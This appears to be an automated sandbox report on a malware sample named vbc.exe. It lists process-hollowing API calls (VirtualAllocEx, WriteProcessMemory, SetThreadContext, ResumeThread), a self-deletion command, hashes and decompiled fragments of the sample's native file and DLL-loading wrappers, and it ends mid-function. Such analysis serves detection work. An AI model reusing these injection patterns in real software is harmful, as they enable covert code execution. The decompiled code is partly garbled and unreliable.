Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3012 Parent PID: 2380

General

Start time:	21:22:28
Start date:	26/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a4e0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2824 Parent PID: 2516 vbc.exeCOMMON

Executed Functions

Function 002D36AA, Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

TV;m, xrefs: 002D36D5

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID: TV;m
API String ID: 0-44820278
Opcode ID: c9285d27125b72b0b1352fbb9572a3401db9a1dbd495c49b766b44b25dad4780
Instruction ID: a578901ecee634b231744e6d08fca3cb44faf17d2098f5e734456a507421bfb3
Opcode Fuzzy Hash: c9285d27125b72b0b1352fbb9572a3401db9a1dbd495c49b766b44b25dad4780
Instruction Fuzzy Hash: B322D474A25218CFDB64CF64C844BEDBBB1BF49304F2081AAD509A7361DBB09E95CF41

Uniqueness

Uniqueness Score: -1.00%

Function 002D0D0A, Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba914b45d39b3b99cfb3d74b0f937b32a02023df918fb11d5fd93bd31f7b5c6
Instruction ID: 361d6955bfb48db5f73f64cc52fcc45580a4cbb3a5348b1463dabfd6cba22bf9
Opcode Fuzzy Hash: eba914b45d39b3b99cfb3d74b0f937b32a02023df918fb11d5fd93bd31f7b5c6
Instruction Fuzzy Hash: FBE1D934A112088FCB14EFB8C4919DEBBB2FF8A304F1585A9D405AB365DB35AD86CF41

Uniqueness

Uniqueness Score: -1.00%

Function 002D0560, Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afbe078595c8651f6ce7b33320cf14f38f0199dac9142d812af71542645f376
Instruction ID: eabc6cd19c74e31426e87ce7b333441d580e2fd9e0b9e97312b02ec70e997bbd
Opcode Fuzzy Hash: 2afbe078595c8651f6ce7b33320cf14f38f0199dac9142d812af71542645f376
Instruction Fuzzy Hash: A7E1C938A102088FCB54EFB8C490ADEBBB2FF89304F558569D405AB365DB35AD86DF41

Uniqueness

Uniqueness Score: -1.00%

Function 002D6008, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7e5e3081a8d93adb2a2e8c6f77e0a671ac151514459806214842e0254fa99f
Instruction ID: 3e8bdb3ee46d6a63d6b28c61b90cc19743a3328a15bdbe4ba679bc98abc60963
Opcode Fuzzy Hash: bb7e5e3081a8d93adb2a2e8c6f77e0a671ac151514459806214842e0254fa99f
Instruction Fuzzy Hash: 65B1C374D24209CBDB14DFA9C488AEDFBB6BF49300F24916AD809AB345D770AD95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002D642C, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc1c0127386c295876bbbf0ef10dd57d513bcdd1a1a58a65642754c7cf580e91
Instruction ID: 1d4884bdf5042fd0a1b47212d62600348b89fe2258ff6e7151c52157b3c22c3b
Opcode Fuzzy Hash: dc1c0127386c295876bbbf0ef10dd57d513bcdd1a1a58a65642754c7cf580e91
Instruction Fuzzy Hash: FBA15878E24109DFCB14CFA9D4889ADBBF6EB58300B24812AE80AEB351D734DD56DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002D21D0, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26dcbb92f35c650598bc3fc15356e492d35b9456d2aaf5d2a06842e9fa120dc
Instruction ID: ac75ab3e1ba912fd75d11a6f484361ceeaabcfc3352a3a87ff5cc413fa5d8714
Opcode Fuzzy Hash: a26dcbb92f35c650598bc3fc15356e492d35b9456d2aaf5d2a06842e9fa120dc
Instruction Fuzzy Hash: 15710370E14259CFCB04CFA9C4846EEBBF2BF99300F24846AE819AB355D7749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002DFA20, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 222processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002DFBFC

Strings

d(S, xrefs: 002DFB53
d(S, xrefs: 002DFC59
d(S, xrefs: 002DFCD9

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: CreateProcess
String ID: d(S$d(S$d(S
API String ID: 963392458-3320293802
Opcode ID: d3728c62e33931b2bd70bec12f6c3369f9b02141d76b3b747e77315b522309c1
Instruction ID: 8e6a47d5b487d590a6be5327afb40b6da6a2ba9f5293d29925d2861cea168940
Opcode Fuzzy Hash: d3728c62e33931b2bd70bec12f6c3369f9b02141d76b3b747e77315b522309c1
Instruction Fuzzy Hash: F681DE74D002698FDB64CFA5C940BDDBBB5BF09304F1095AAE909B7260EB309E89DF54

Uniqueness

Uniqueness Score: -1.00%

Function 005E0150, Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005E022E

Memory Dump Source

Source File: 00000004.00000002.2138533093.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2e9f41b83ba52287fe5e67a566f789960cb8e829166e54b7948301ecfc1afe8f
Instruction ID: 16468075f6a557e187282a7167ee876f860c8eb4ccf40276990e317d43410252
Opcode Fuzzy Hash: 2e9f41b83ba52287fe5e67a566f789960cb8e829166e54b7948301ecfc1afe8f
Instruction Fuzzy Hash: 2C4189B9D002589FCF14CFA9D984ADEFBF1BB09310F24942AE818B7250D374AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005E0158, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005E022E

Memory Dump Source

Source File: 00000004.00000002.2138533093.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c49c1f12daa18772a5592e699b515d74d5b44756e7c29459bcf4f422199c9c0d
Instruction ID: d2558ac9542c11811e04f6583b8564e2c39c7526fe0123f29bd9f19956abc1f2
Opcode Fuzzy Hash: c49c1f12daa18772a5592e699b515d74d5b44756e7c29459bcf4f422199c9c0d
Instruction Fuzzy Hash: 184178B9D002589FCF04CFA9D984ADEFBF1BB49314F24942AE818B7250D374AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 002DFE68, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002DFF1D

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5434c35a541ccdeba7e4efbff12ae812dcb0037331c5b3829ac8069fb9f25f74
Instruction ID: c10da02064861b5bb938e4adbef2422216eac4f30f22307f0d3b2dc8dbd949ae
Opcode Fuzzy Hash: 5434c35a541ccdeba7e4efbff12ae812dcb0037331c5b3829ac8069fb9f25f74
Instruction Fuzzy Hash: DC4197B9D042589FCF10CFA9D984ADEFBB1BB0A310F20902AE815B7310D375AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 005E0048, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005E00F5

Memory Dump Source

Source File: 00000004.00000002.2138533093.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d8eb986d8c095c7240de672f9a419b131d698f7b6205b1b116b14d0853d29518
Instruction ID: c56d33363e78ef03c95bfd2f10368f987d742b157dc510c8290cf02722f5a4c0
Opcode Fuzzy Hash: d8eb986d8c095c7240de672f9a419b131d698f7b6205b1b116b14d0853d29518
Instruction Fuzzy Hash: 623165B8D042589FCF14CFA9D984ADEFBB5BB09310F20A42AE814B7310D375A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002DFD50, Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 002DFE02

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d75e1bb5c855fa3461a3191bcd88c11b94738be41fa2e140605839db639d8d4a
Instruction ID: 29a4b8adfbcab1bda2a3cc736286c7f94e393ff70fc196411427f2709cbf8f8e
Opcode Fuzzy Hash: d75e1bb5c855fa3461a3191bcd88c11b94738be41fa2e140605839db639d8d4a
Instruction Fuzzy Hash: 1D31CAB4D002589FCB10CFA9D984ADEFBF1BB49314F24802AE419B7310C778AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 005E0298, Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 005E031E

Memory Dump Source

Source File: 00000004.00000002.2138533093.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1bdd7bf366eac960b7731832164bf8886079f62354b3e74f8f9d1720cb374e86
Instruction ID: 0b51f54e4e9aa6841424c42950ce8a51c43df048596ccbaccbda5308f80e128d
Opcode Fuzzy Hash: 1bdd7bf366eac960b7731832164bf8886079f62354b3e74f8f9d1720cb374e86
Instruction Fuzzy Hash: 6B31AAB8D042589FCB10CFA9E984ADEFBF0BB49310F24945AE858B7350C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 005E02A0, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 005E031E

Memory Dump Source

Source File: 00000004.00000002.2138533093.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3be5bbb857a4b7c30f15671267747edfb7a26873591318a8a600793aa46306e0
Instruction ID: 21503de3c04e9ea74c9e635b62166b25d9266692a6659baa9ec30e74e6660c6e
Opcode Fuzzy Hash: 3be5bbb857a4b7c30f15671267747edfb7a26873591318a8a600793aa46306e0
Instruction Fuzzy Hash: 5D21AAB8D002589FCB10CFA9D884ADEFBF4BB49314F24942AE818B7310C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137444377.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b81ff690040f1a514aba960237ffc80a421514abffa4e5444aff589e65d47a19
Instruction ID: abd1d6d50a96e539437aae803a7ae1942bdb5f8cbae34cbe12cc0c0b53ef94e3
Opcode Fuzzy Hash: b81ff690040f1a514aba960237ffc80a421514abffa4e5444aff589e65d47a19
Instruction Fuzzy Hash: 9E21C275604208EFDB15DF60E9C0B26BBB5FF84314F24C9A9E84E4B246C336D857CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0017D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137444377.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c0aa2c25eed8f88d1ba70391b6a9c1b31c7c36321642e4bdad9e6181498c8d
Instruction ID: 55a67321e561935cafb8b1fc3e764219b3e16e099605f6d2d4702ca18da27097
Opcode Fuzzy Hash: 95c0aa2c25eed8f88d1ba70391b6a9c1b31c7c36321642e4bdad9e6181498c8d
Instruction Fuzzy Hash: 2B21C275604248DFDB14DF64E984B16BB75FF84314F24C9A9E80E4B246C336D857CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137444377.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea5eab12d3d68bb6a4ccaf2f8303e4e908e3fee9c788e15fe732f3aa5f178a69
Instruction ID: 3a6f457ccadecaf9bd474cee247833d851535d2909521cb63ce1ba1ee83d5b6f
Opcode Fuzzy Hash: ea5eab12d3d68bb6a4ccaf2f8303e4e908e3fee9c788e15fe732f3aa5f178a69
Instruction Fuzzy Hash: 15215B755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498F6A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137444377.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5f5576a1ed59b4d0ce5f0cb2263d9ca5eff77ec4be95978a5be43568d34d43
Instruction ID: dd847ba84d5bf5c2c39296fb3977f821f513d675f204cee7993ce99f7f55bf8a
Opcode Fuzzy Hash: ab5f5576a1ed59b4d0ce5f0cb2263d9ca5eff77ec4be95978a5be43568d34d43
Instruction Fuzzy Hash: 63118B75544284DFCB12CF10E5C4B15BFB1FF84314F28C6A9D8494B656C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000BD211, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137348536.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30336b2b32ca367ddf3fc8815ce46b00de90abba54fef9cb70d41135e8049efa
Instruction ID: ecff73268cb7e6ade8e14b6000dd8f55e4be26d5aa719ae8d5adc96e107a77a8
Opcode Fuzzy Hash: 30336b2b32ca367ddf3fc8815ce46b00de90abba54fef9cb70d41135e8049efa
Instruction Fuzzy Hash: 2001F7304083849AEB608B55CD88BA7FBD8DF61324F14C45BDD055B282D378DC44D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 000BD210, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137348536.00000000000BD000.00000040.00000001.sdmp, Offset: 000BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06b57eba3c889ed47cca400774f032179e302c68be4eebb41c301b25ead70e73
Instruction ID: 040ad1db0b623cf70a9341fb703209332cbe2e56b89a10fa654b142dae1dd9ac
Opcode Fuzzy Hash: 06b57eba3c889ed47cca400774f032179e302c68be4eebb41c301b25ead70e73
Instruction Fuzzy Hash: 53F04F714042849BEB508A55CD88BA2FFD8EF61764F18C55AED085B282D379EC44CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002DAD71, Relevance: 4.3, Strings: 2, Instructions: 1786COMMON

Download Yara Rule

Strings

@2;m, xrefs: 002DAE44
TV;m, xrefs: 002DAE06

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID: @2;m$TV;m
API String ID: 0-4141031275
Opcode ID: 6b726542db8a06d6a673a5cd801d2e04970fa558c7de818a0b29bcc9389770f0
Instruction ID: 34f74341e05a459c21c2a7d27da15c0470ead5ea9220f16a1d556675e30c36a0
Opcode Fuzzy Hash: 6b726542db8a06d6a673a5cd801d2e04970fa558c7de818a0b29bcc9389770f0
Instruction Fuzzy Hash: CD039D7A600114AFDB469F94C944E95BBB2FF4D318F1A80D4E6099F276C732E8A1EF41

Uniqueness

Uniqueness Score: -1.00%

Function 002D4A40, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37cc9b2564dc482e94064acaba1e7dd109de3b61171d4d3226febe90bf4c5073
Instruction ID: 8c8936a86701716410ed4afb8acde8ee60f1b9d169d38cdfc68b3c4fc8c7dc28
Opcode Fuzzy Hash: 37cc9b2564dc482e94064acaba1e7dd109de3b61171d4d3226febe90bf4c5073
Instruction Fuzzy Hash: 29111270E14609DBEB08CFABD8501EEFBF3AFC9300F18D07AD804A6265EA7449028F15

Uniqueness

Uniqueness Score: -1.00%

Function 002D4A50, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137468050.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd4f03c1ef3de65b072024633922daf352ed37ad58fb3ce77a17059f69c450b
Instruction ID: cb8fc3607262b1fe0c4fbef7e6a21b6b9216db437cffc1af2336d11e05e2b667
Opcode Fuzzy Hash: 1fd4f03c1ef3de65b072024633922daf352ed37ad58fb3ce77a17059f69c450b
Instruction Fuzzy Hash: 5111E371E14608DBEB08DFABD8401AEFAF7AFC9300F14D03AD908A6364EB7049418F54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2844 Parent PID: 2824 vbc.exeCOMMON

Executed Functions

Function 004182CA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E004182CA(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t23;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t36;

				asm("adc [es:ebp+0x3f], ebx");
				if(__eflags > 0) {
					_t18 = _a4;
					_t34 = _a4 + 0xc48;
					E00418DD0(_t32, _t18, _t34,  *((intOrPtr*)(_t18 + 0x10)), 0, 0x2a);
					_t4 =  &_a40; // 0x413a21
					_t6 =  &_a32; // 0x413d62
					_t12 =  &_a8; // 0x413d62
					_t23 =  *((intOrPtr*)( *_t34))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t33, _t36); // executed
					return _t23;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40974f
					__esi = _t15;
					E00418DD0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}

0x004182ca
0x004182ce
0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9
0x004182d0
0x004182d1
0x004182d3
0x004182d6
0x004182df
0x004182df
0x004182ef
0x004182f5
0x004182f7
0x004182f8
0x004182f9
0x004182f9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8
b=A, xrefs: 004182A2, 004182B0

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 1bd782fd267d3706ed307677a361fe5e779b1d6173d05e999f87c05cf0400684
Instruction ID: ff7cb8e87d0bdb31b2567b0867db77e0967266a243553fca46b961aa19e9f7fa
Opcode Fuzzy Hash: 1bd782fd267d3706ed307677a361fe5e779b1d6173d05e999f87c05cf0400684
Instruction Fuzzy Hash: 38112A72200208AFCB14EF99DC81EDB77A8EF8C754F058259FE1D97241CA30ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041827C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041827C(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t19;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				_t14 = _a4;
				_t30 = _a4 + 0xc48;
				E00418DD0(_t28, _t14, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t29, _t32); // executed
				return _t19;
			}

0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8
b=A, xrefs: 004182A2, 004182B0

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 7595961020a335c1b0a990e2e05f4bef67296ba4e9849649e7ee372cf7b151fc
Instruction ID: 80ecb7b4fd5ee993e3f861c0f7568f73efc24a4d53ca6099b0d1ebed7bec2137
Opcode Fuzzy Hash: 7595961020a335c1b0a990e2e05f4bef67296ba4e9849649e7ee372cf7b151fc
Instruction Fuzzy Hash: 9AF097B6210208ABCB14DF89DC81DEB77A9AF8C754F158249BA1D97251D630EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8
b=A, xrefs: 004182A2, 004182B0

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_push(_a8);
				asm("invalid");
				_push(0x104);
				_push( &_v12);
				_v8 =  &_v536;
				_t15 = E0041AB60();
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B200( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b44
0x00409b46
0x00409b4b
0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181df
0x004181e7
0x0041821d
0x00418221

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181CE, Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181CE(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t15 = _a4;
